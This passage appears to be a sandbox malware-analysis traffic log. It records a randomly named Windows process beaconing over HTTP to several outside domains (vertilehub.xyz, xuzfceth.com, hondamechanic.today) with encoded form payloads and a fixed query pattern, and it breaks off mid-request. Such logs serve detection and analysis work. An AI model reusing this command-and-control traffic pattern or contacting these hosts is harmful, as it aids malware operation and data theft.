                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            15 | 192.168.2.6 | 49739 | 203.161.49.220 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:32.885875940 CEST | 1773 | OUT | POST /ei4t/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.vertilehub.xyz
                                            Origin: http://www.vertilehub.xyz
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.vertilehub.xyz/ei4t/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 69 4c 69 65 53 49 46 5a 30 48 78 65 55 34 4d 55 67 49 43 46 4d 45 51 68 59 31 67 33 5a 30 59 52 32 53 62 63 46 54 59 33 30 57 65 58 6b 74 67 38 2b 69 56 48 43 71 36 52 6e 5a 69 4b 55 49 68 68 4f 35 5a 55 66 43 44 54 62 6a 4e 65 4c 6f 62 41 47 49 4e 56 6b 43 58 42 52 6e 35 37 37 38 57 44 48 37 6b 68 30 58 62 56 61 70 42 42 52 5a 73 53 44 72 2f 2f 31 35 37 72 71 6e 6c 67 4f 78 35 47 34 6e 61 33 5a 70 68 74 46 57 35 51 76 74 52 72 4c 6f 68 53 62 42 39 58 79 48 30 51 47 6c 6e 45 68 2b 50 38 57 70 48 36 48 51 71 70 6e 43 79 42 67 2b 7a 4a 30 78 6d 36 41 58 6e 4b 50 77 2f 34 61 64 2f 73 75 4a 62 6b 4e 4b 33 51 4c 34 2b 6e 47 53 56 44 4e 74 41 64 63 53 72 58 44 4f 77 41 78 2f 79 62 67 52 6f 72 43 4b 34 4b 6c 41 61 79 43 36 76 71 66 53 52 37 4e 73 58 62 6a 6f 44 6b 6a 46 4e 4d 37 2b 46 4b 42 61 76 65 68 52 6c 50 4b 6b 72 4d 6f 65 69 68 37 56 76 45 4d 36 32 30 74 7a 75 79 71 76 74 78 4e 73 73 48 71 39 74 77 36 41 63 5a 44 6e 51 50 71 4d 33 6d 50 59 77 33 7a 36 47 73 6c 45 46 61 58 4c 35 35 [TRUNCATED]
                                            Data Ascii: Z6ZTG= [TRUNCATED]
                                            Jul 3, 2024 18:53:33.485022068 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:33 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            16 | 192.168.2.6 | 49740 | 203.161.49.220 | 80 | 5680 | C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Jul 3, 2024 18:53:35.418169022 CEST | 480 | OUT | GET /ei4t/?3pSl=bXiTJHhxyN&Z6ZTG=vJK+R49o60hMb5R0zuW0LjMDSBoWblw/xm7bGUo972WEnNUAqilJR4ikt7uwBrcRV8UZThTaEWZ7S+DdGKZTmgrpJBBQs9ifJOYm4nfBSZlzTv8zXZPL/ZPwonFSFx1LsUa4ZMM= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.vertilehub.xyz
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:53:36.031656027 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:53:35 GMT
                                            Server: Apache
                                            Content-Length: 389
                                            Connection: close
                                            Content-Type: text/html; charset=utf-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                            Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 49741 | Destination IP: 152.32.156.214 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:53:49.602623940 CEST | Bytes transferred: 730 | Direction: OUT
                                            POST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 33 43 35 54 71 50 6a 4a 76 58 2b 55 55 35 66 72 6a 54 66 63 32 62 6c 49 44 6f 49 75 6e 54 41 42 58 6f 75 53 52 32 71 51 44 4f 54 69 53 33 77 5a 79 30 49 62 36 63 59 75 41 48 72 4c 64 4d 36 56 4c 54 58 37 64 58 62 4d 75 46 49 77 4e 43 61 76 36 72 39 30 4e 70 44 34 72 78 32 46 39 50 6b 63 51 41 6b 52 42 4a 32 76 52 64 4b 6f 4d 35 54 57 47 79 54 59 68 77 63 7a 32 6e 4a 5a 4f 56 54 54 65 7a 71 6a 58 63 46 6a 33 55 54 4f 30 75 4a 4e 69 6e 45 6f 55 75 78 58 6c 4f 66 43 65 70 49 65 6e 31 42 6b 2f 49 67 64 78 49 73 53 45 2b 2f 57 66 6b 43 4a 44 6e 67 6d 34 39 7a 7a 6a 4a 5a 74
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE3C5TqPjJvX+UU5frjTfc2blIDoIunTABXouSR2qQDOTiS3wZy0Ib6cYuAHrLdM6VLTX7dXbMuFIwNCav6r90NpD4rx2F9PkcQAkRBJ2vRdKoM5TWGyTYhwcz2nJZOVTTezqjXcFj3UTO0uJNinEoUuxXlOfCepIen1Bk/IgdxIsSE+/WfkCJDngm49zzjJZt
                                            Timestamp: Jul 3, 2024 18:53:50.554016113 CEST | Bytes transferred: 295 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:50 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49743 | Destination IP: 152.32.156.214 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:53:52.141702890 CEST | Bytes transferred: 754 | Direction: OUT
                                            POST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 32 69 70 54 70 73 4c 4a 70 33 2b 54 52 35 66 72 34 6a 66 69 32 62 5a 49 44 70 64 32 6e 68 55 42 58 4a 65 53 51 31 79 51 50 75 54 69 5a 58 77 63 38 55 49 75 36 63 45 59 41 47 58 4c 64 50 47 56 4c 53 4c 37 63 6b 7a 4e 74 31 49 79 57 79 61 68 6c 37 39 30 4e 70 44 34 72 79 4c 71 39 4d 55 63 51 78 55 52 41 6f 32 75 63 39 4b 72 45 5a 54 57 52 43 53 52 68 77 64 65 32 6d 56 2f 4f 54 58 54 65 78 79 6a 58 74 46 73 75 6b 54 49 72 65 49 6b 73 45 63 6c 53 49 41 32 6d 39 4b 75 4b 72 45 48 6d 44 41 2b 6a 37 67 2b 6a 59 4d 51 45 38 6e 6b 66 45 43 6a 42 6e 59 6d 71 71 2f 55 73 39 38 4f 4c 72 4a 37 4a 68 33 4e 6a 68 43 71 6b 58 52 4e 66 4b 45 38 52 41 3d 3d
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE2ipTpsLJp3+TR5fr4jfi2bZIDpd2nhUBXJeSQ1yQPuTiZXwc8UIu6cEYAGXLdPGVLSL7ckzNt1IyWyahl790NpD4ryLq9MUcQxURAo2uc9KrEZTWRCSRhwde2mV/OTXTexyjXtFsukTIreIksEclSIA2m9KuKrEHmDA+j7g+jYMQE8nkfECjBnYmqq/Us98OLrJ7Jh3NjhCqkXRNfKE8RA==
                                            Timestamp: Jul 3, 2024 18:53:53.073028088 CEST | Bytes transferred: 295 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:52 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 49744 | Destination IP: 152.32.156.214 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:53:54.682863951 CEST | Bytes transferred: 1767 | Direction: OUT
                                            POST /wvfe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.xuzfceth.com
                                            Origin: http://www.xuzfceth.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.xuzfceth.com/wvfe/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 77 71 72 46 6f 79 73 46 55 31 68 45 32 69 70 54 70 73 4c 4a 70 33 2b 54 52 35 66 72 34 6a 66 69 32 62 5a 49 44 70 64 32 6e 68 4d 42 55 37 36 53 53 56 4f 51 4f 75 54 69 48 6e 77 64 38 55 49 4a 36 63 64 52 41 47 62 39 64 4b 43 56 49 77 76 37 62 56 7a 4e 36 46 49 79 4a 43 61 73 36 72 39 74 4e 70 7a 38 72 79 62 71 39 4d 55 63 51 79 4d 52 48 35 32 75 61 39 4b 6f 4d 35 54 61 47 79 53 39 68 77 46 67 32 6d 42 77 4f 69 72 54 65 52 69 6a 48 4c 35 73 78 55 54 4b 6f 65 49 38 73 45 68 6c 53 49 30 55 6d 2b 58 7a 4b 72 77 48 6b 57 39 67 7a 76 34 46 69 4b 55 69 63 2f 66 53 65 42 43 31 46 58 63 42 69 36 33 59 6a 63 49 39 45 37 56 50 64 78 4f 75 68 47 4b 4c 75 78 38 6f 66 4c 68 79 54 69 6c 62 53 46 69 4d 67 68 52 36 2b 6c 50 4d 61 4e 62 4f 57 75 6d 79 48 50 4d 4e 59 50 69 48 44 4c 64 35 62 6a 53 33 66 5a 52 61 66 38 6c 2b 61 65 4a 6c 69 32 53 33 30 35 66 51 44 48 64 49 62 52 50 7a 41 61 51 43 69 6a 55 79 6d 70 4e 65 39 66 7a 6e 4c 35 37 44 53 6c 58 41 56 6b 6a 49 38 31 38 34 35 68 2b 6f 38 72 77 55 [TRUNCATED]
                                            Data Ascii: Z6ZTG=wqrFoysFU1hE2ipTpsLJp3+TR5fr4jfi2bZIDpd2nhMBU76SSVOQOuTiHnwd8UIJ6cdRAGb9dKCVIwv7bVzN6FIyJCas6r9tNpz8rybq9MUcQyMRH52ua9KoM5TaGyS9hwFg2mBwOirTeRijHL5sxUTKoeI8sEhlSI0Um+XzKrwHkW9gzv4FiKUic/fSeBC1FXcBi63YjcI9E7VPdxOuhGKLux8ofLhyTilbSFiMghR6+lPMaNbOWumyHPMNYPiHDLd5bjS3fZRaf8l+aeJli2S305fQDHdIbRPzAaQCijUympNe9fznL57DSlXAVkjI81845h+o8rwUD0D7T/GBL0Q21Yp0XQUYDKqfI4irvn4CII1p8hrx8BnXZvYZ6BHyp/RKUG0Mmmme44tZfpPqilL3EcBwOVuX7yH22qkSGLLm3sM3pIkDIESnWB57d2bd+HESQjVfvBh1JsivWJ6D/nn4N0mR5uR3egMcBzCS+7+iTHXFZKw0/B2+qMCb22ZDTG1tIRfmwUle4jz/XKosB4a1X5yuHbhkJuzHpDtbg2493LnCCjm6yTOqBzc5fn48IGytRFBRmA9lVgQlJtKKMOX+vUGvM/C7T3tlFLLSFqcwl/N/sbS48IzCfK1yFWd/MWq3/vaK5PFtPw9YltcG+dckcYJFzmuEKisJSx8CZZNUqvo1y7gmQX8WMx9V4dwkcpkl5/JI6+1pKwn2JAn1hkyDPA0jQiMAyU3k5uHmV7+x8uUxOsfooDwj1owu/cLstNzkCztQDzIjlNlnAkC3mOZ2MlkWqJsn93FNLcIOGZK+OSUr8rMLZJwS0vbdUz39IkqbUUU58/dNo+E4k5r8/PN7qj2PqgfwDK0T/CiiQQXYgKhBW30fRvGNFNCmR10W98WSjmWdk6bf6Bbhj2tP6tOeFYiGVVIRTdvkLoiSJeWG7aHFh+7LdEhTTeyohLXvTLAr9KkjbJ6t/ArER8C2ikHFHLFHWVGL8N/KAiaXLijkFI [TRUNCATED]
                                            Timestamp: Jul 3, 2024 18:53:55.608947039 CEST | Bytes transferred: 295 | Direction: IN
                                            HTTP/1.1 405 Not Allowed
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 150
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                            Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 49745 | Destination IP: 152.32.156.214 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:53:57.213774920 CEST | Bytes transferred: 478 | Direction: OUT
                                            GET /wvfe/?3pSl=bXiTJHhxyN&Z6ZTG=9oDlrGBoczxc0gczmqK1qT+UWdDZ5zHLqosyG+84tRh7R4eQSXiPG8LnfVg9iGgF5+wWImCEQfufShLjWU3N10ZwNVybtIBwFMrSzRX1wq0uGk8UZr/5T8KnA73sbBy91RxM/wk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.xuzfceth.com
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Timestamp: Jul 3, 2024 18:53:58.245620012 CEST | Bytes transferred: 1236 | Direction: IN
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 03 Jul 2024 16:53:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 2495
                                            Last-Modified: Fri, 12 Jan 2024 02:44:44 GMT
                                            Connection: close
                                            Vary: Accept-Encoding
                                            ETag: "65a0a79c-9bf"
                                            Accept-Ranges: bytes
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 31 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 4f 44 4f 52 20 49 4e 44 49 41 20 53 45 43 55 52 49 54 59 20 53 45 52 56 49 43 45 53 20 50 52 49 56 41 54 45 20 4c 49 4d 49 54 45 44 20 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 31 22 20 64 61 74 61 2d 68 69 64 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 [TRUNCATED]
                                            Data Ascii: <!doctype html><html lang="en" data-n-head="%7B%22lang%22:%7B%221%22:%22en%22%7D%7D"> <head> <title>HODOR INDIA SECURITY SERVICES PRIVATE LIMITED </title><meta data-n-head="1" charset="utf-8"><meta data-n-head="1" name="viewport" content="width=device-width,initial-scale=1"><meta data-n-head="1" data-hid="description" name="description" content=""><meta data-n-head="1" name="format-detection" content="telephone=no"><link data-n-head="1" rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" href="/_nuxt/e186113.js" as="script"><link rel="preload" href="/_nuxt/eff948d.js" as="script"><link rel="preload" href="/_nuxt/7b29598.js" as="script"> </head> <body> <div id="__nuxt"><style>#nuxt-loading{background:#fff;visibility:hidden;opacity:0;position:absolute;left:0;right:0;top:0;bottom:0;display:flex;justify-content:center;align-items:center;flex-direction:column;animation:nuxtLoadingIn 10s ease;-webkit-animation:nuxtLoadingIn 10s ease;animation-f
                                            Timestamp: Jul 3, 2024 18:53:58.245637894 CEST | Bytes transferred: 1236 | Direction: IN
                                            Data Raw: 69 6c 6c 2d 6d 6f 64 65 3a 66 6f 72 77 61 72 64 73 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 40 6b 65 79 66 72 61 6d 65 73 20 6e 75 78 74 4c 6f 61 64 69 6e 67 49 6e 7b 30 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6f 70
                                            Data Ascii: ill-mode:forwards;overflow:hidden}@keyframes nuxtLoadingIn{0%{visibility:hidden;opacity:0}20%{visibility:visible;opacity:0}100%{visibility:visible;opacity:1}}@-webkit-keyframes nuxtLoadingIn{0%{visibility:hidden;opacity:0}20%{visibility:visibl
                                            Timestamp: Jul 3, 2024 18:53:58.245649099 CEST | Bytes transferred: 273 | Direction: IN
                                            Data Raw: 22 3e 3c 64 69 76 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 4e 55 58 54 5f 5f 3d 7b 63 6f 6e 66 69 67 3a 7b 5f 61 70 70 3a 7b 62 61 73 65 50 61 74 68
                                            Data Ascii: "><div>Loading...</div></div></div><script>window.__NUXT__={config:{_app:{basePath:"/",assetsPath:"/_nuxt/",cdnURL:null}}}</script> <script src="/_nuxt/e186113.js"></script><script src="/_nuxt/eff948d.js"></script><script src="/_nuxt/7b29598


                                            Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 49746 | Destination IP: 64.190.62.22 | Destination Port: 80 | PID: 5680 | Process: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            Timestamp: Jul 3, 2024 18:54:03.383797884 CEST | Bytes transferred: 751 | Direction: OUT
                                            POST /expp/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.hondamechanic.today
                                            Origin: http://www.hondamechanic.today
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.hondamechanic.today/expp/
